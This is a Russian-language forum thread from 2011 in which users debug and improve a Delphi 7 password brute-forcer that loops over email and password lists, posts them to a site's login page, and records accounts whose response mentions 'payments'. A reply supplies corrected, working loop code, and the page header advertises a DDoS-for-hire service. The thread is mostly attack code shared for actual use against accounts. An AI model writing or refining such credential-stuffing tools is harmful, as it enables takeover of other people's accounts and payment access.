Цикл и Delphi 7 - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 08.12.2011, 17:04   #1 (permalink)
VPN
Статус: Работяга
 
Аватар для Gdasarhik
 
Регистрация: 08.12.2011
Сообщений: 295
Member ID: 21855

Репутация: 359
Репутация: 359
Сказал(а) спасибо: 164
Поблагодарили 125 раз(а) в 90 сообщениях
Топикстартер (автор темы) Вопрос Цикл и Delphi 7

Привет всем!
Вот хочу у вас спросить на счет циклов.
Я вот написал маленький кодец брута:
PHP код:
procedure TForm1.Button1Click(SenderTObject); 
var 
i,jinteger
infoTstringlist
pstring
begin 
info
:=tstringlist.Create

for 
i:=0 to Mmo1.Lines.Count-do 
for 
j:=0 to mmo2.Lines.Count-do 
begin 
    
try 
    
info.Add('aut_email='+Mmo1.Lines.Strings[i]); 
    
info.Add('aut_pass='+Mmo2.Lines.Strings[j]); 
    
info.Add('enter=войти'); 
    
p:=IdHtp1.Post('http://site.ru/UserEnter.html'info); 
    if 
pos('payments'p)>0 then 
    begin 
    Mmo3
.Lines.Add(Mmo1.Lines.Strings[i]+':'+Mmo2.Lines.Strings[j]); 
    
info.Free
    
end
    
except 
    end

end
end
И хочу чтобы после нахождения правильного пароля брут занялся другим акком,ведь подбирать пароль к акку после нахождения к нему же валидного пароля бессмысленно...

И вот я сделал так после нахождения валидного пароля :
PHP код:
if pos('payments'p)>0 then  
    begin  
    Mmo3
.Lines.Add(Mmo1.Lines.Strings[i]+':'+Mmo2.Lines.Strings[j]); 
    
i:=i+1j:=0
Но компилятор ругается! Я догадываюсь почему,ведь НЕЛЬЗЯ внутри цикла for изменять счетчик цикла. НЕЛЬЗЯ. и хоть удавись, но никак ты это правило не обойдешь.

И я решил переписать код с while и вот что получилось!
PHP код:
procedure TForm1.Button1Click(SenderTObject);
var 
i,j,: integer;
infoTstringlist
pstring
begin
i
:=0;   j:=0;
while 
<  Mmo1.Lines.Count mmo2.Lines.Count do
while 
Mmo1.Lines.Count mmo2.Lines.Count do
begin
    info
:=tstringlist.Create;
    
IdHtp1:=TIdHTTP.Create(nil);
    
info.Add('aut_email='+Mmo1.Lines.Strings[i]);
    
info.Add('aut_pass='+Mmo2.Lines.Strings[j]); 
    
info.Add('enter=войти');
    
p:='';
    try
    
p:=IdHtp1.Post('http://site.ru/UserEnter.html'info);
    
finally
    IdHtp1
.free;
    
end;
    if 
pos('payments'p)<>0 then
    begin
     Mmo3
.Lines.Add(Mmo1.Lines.Strings[i]+':'+Mmo2.Lines.Strings[j]);
     
i:=i+1;j:=0;
     
end
     
else
     
begin
      j
:=j+1;
     
end;
    
info.free;

end;
end;

end
Но почему-то Програмка берет первый акк и подбирает к ниму все пароли.а вто к остальным он этого не делает! Почему? Скажите,где ошибка в коде!
P.S.
Код ужасен... ну уж как сумел.

Подскажите,как усовершенствовать код,сделать его более эффективным.
Gdasarhik вне форума   Ответить с цитированием
Старый 08.12.2011, 18:07   #2 (permalink)
SOCKS4
 
Регистрация: 07.01.2010
Сообщений: 192
Member ID: 5556
ICQ 484848484

Репутация: 910
Репутация: 910
Сказал(а) спасибо: 78
Поблагодарили 398 раз(а) в 177 сообщениях
По умолчанию Re: Цикл и Delphi 7

стандартный оператор для выхода из цикла \break\

Код:
procedure TForm1.Button1Click(Sender: TObject);  
var i,j: integer;  
info: Tstringlist;  
p: string;  
begin  

for i:=0 to Mmo1.Lines.Count-1 do  
for j:=0 to mmo2.Lines.Count-1 do  
begin
    info:=tstringlist.Create; 
    IdHtp1:=TIdHTTP.Create(nil);
    try  
    info.Add('aut_email='+Mmo1.Lines.Strings[i]);  
    info.Add('aut_pass='+Mmo2.Lines.Strings[j]);  
    info.Add('enter=войти');  
    p:=IdHtp1.Post('http://site.ru/UserEnter.html', info);  
    if pos('payments', p)>0 then  
    begin  
    Mmo3.Lines.Add(Mmo1.Lines.Strings[i]+':'+Mmo2.Lines.Strings[j]);  
    info.Free;
    IdHtp1.free;
    break;  
    end;  
    except  
    end;  
end;  
end;
k0tt0d вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 08.12.2011, 21:16   #3 (permalink)
VPN
Статус: Работяга
 
Аватар для Gdasarhik
 
Регистрация: 08.12.2011
Сообщений: 295
Member ID: 21855

Репутация: 359
Репутация: 359
Сказал(а) спасибо: 164
Поблагодарили 125 раз(а) в 90 сообщениях
Топикстартер (автор темы) Вопрос Re: Цикл и Delphi 7

Спасибо k0tt0d ! Как же я сам до этого не додумался.

Добавлено через 21 минуту 16 секунд

Вот хотел прикрутить к проге Gauge ,но узнать точное максимальное значение я не могу.
Если вот так:
PHP код:
Gauge.MaxValue:=Mmo1.Lines.Count Mmo2.Lines.Count 
То при нахождении валидного акка в Gauge будет пробел,а это не очень хорошо!
Т.е. если будет найден валидны пароль,то те пароли которые не валидны(оставшиеся) по моему коду будут считаться,но это не правильно!

Подскажите,как рассчитать Gauge.MaxValue в ходе перебора.

Последний раз редактировалось Gdasarhik; 09.12.2011 в 14:11.
Gdasarhik вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Delphi Radzhab Флейм 10 20.06.2011 19:34
Delphi 7 Проблема kekc Флейм 5 26.01.2011 18:42
Javascript > Delphi NekitoSP Программирование 7 23.05.2010 15:46




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.